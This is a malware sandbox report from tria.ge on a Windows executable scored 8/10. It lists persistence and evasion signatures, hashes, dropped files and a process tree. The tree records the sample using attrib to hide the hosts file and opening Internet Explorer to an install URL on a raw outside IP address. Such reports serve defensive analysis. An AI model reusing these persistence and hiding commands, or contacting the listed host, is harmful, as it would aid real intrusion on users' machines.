Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

b01dc2f235...93.exe

windows7-x64

8

b01dc2f235...93.exe

windows10-2004-x64

3

Analysis

  • max time kernel
    268s
  • max time network
    365s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    06/12/2022, 20:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe

  • Size

    383KB

  • MD5

    d74fe73f5ea1ee78d0b46b6a2106b028

  • SHA1

    a1e4cd6f3fd6610617181de0bce0a44e7ece505c

  • SHA256

    b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493

  • SHA512

    df50604613b9071e54f8efa7258cb24f674348ac377f90eb3f16ae7aa32451ac4b96e5d47d2e60f6e37f69021c020081d4987efda5fb76b1fdab1c2961b0b2b5

  • SSDEEP

    6144:xLuHiunxeEzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzj:5A/zzzzzzzzzzzzzzzzzzzzzzzzzzzzX

Score
8/10
evasionpersistence

Malware Config

Signatures

  • Adds policy Run key to start application 2 TTPs 2 IoCs
    persistence
  • Drops file in Drivers directory 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Drops file in Windows directory 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 28 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 36 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1252
      • C:\Users\Admin\AppData\Local\Temp\b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe
        "C:\Users\Admin\AppData\Local\Temp\b01dc2f235374e1da06898b17bff8e62179646f967b9e2acd2c8b1eef297d493.exe"
        2⤵
        • Adds policy Run key to start application
        • Drops file in Drivers directory
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:892
        • C:\Windows\SysWOW64\attrib.exe
          attrib -s -h "C:\Windows\system32\drivers\etc\hosts"
          3⤵
          • Views/modifies file attributes
          PID:1664
        • C:\Windows\SysWOW64\attrib.exe
          attrib +s +h "C:\Windows\system32\drivers\etc\hosts"
          3⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:1396
        • C:\program files\internet explorer\iexplore.exe
          "C:\program files\internet explorer\iexplore.exe" "http://216.98.148.11/htgl/install.asp?ver=090302&tgid=admin666&address=72-59-88-84-44-7E&regk=1&flag=fc13c5fef5c681cb0c9a3272aee381cd&frandom=3304"
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1492
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1492 CREDAT:275457 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:596
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x53c
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1276

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\DH5BWAEA.txt
      Filesize

      601B

      MD5

      76b79b99e21d376903a149ee92aec5aa

      SHA1

      a0b98db5c0d9aa15ad0b1384d4ec3f476caa25fb

      SHA256

      f01b96902437791c6caffc41dbf48892f21a7f141651a6de2ebaa9960c15ed37

      SHA512

      b8ae1cc86f6908e9aca2c6714fa1293f6f5dfe8f2c43665a741ad8d31edb1cd328d2568326c9219578ea8a3451663306a1b3301c8c962a745cee2ab2a2b849a6

      Download Submit

    • memory/892-54-0x0000000075E01000-0x0000000075E03000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1252-58-0x00000000003F0000-0x00000000003F1000-memory.dmp

      Filesize

      4KB

      Download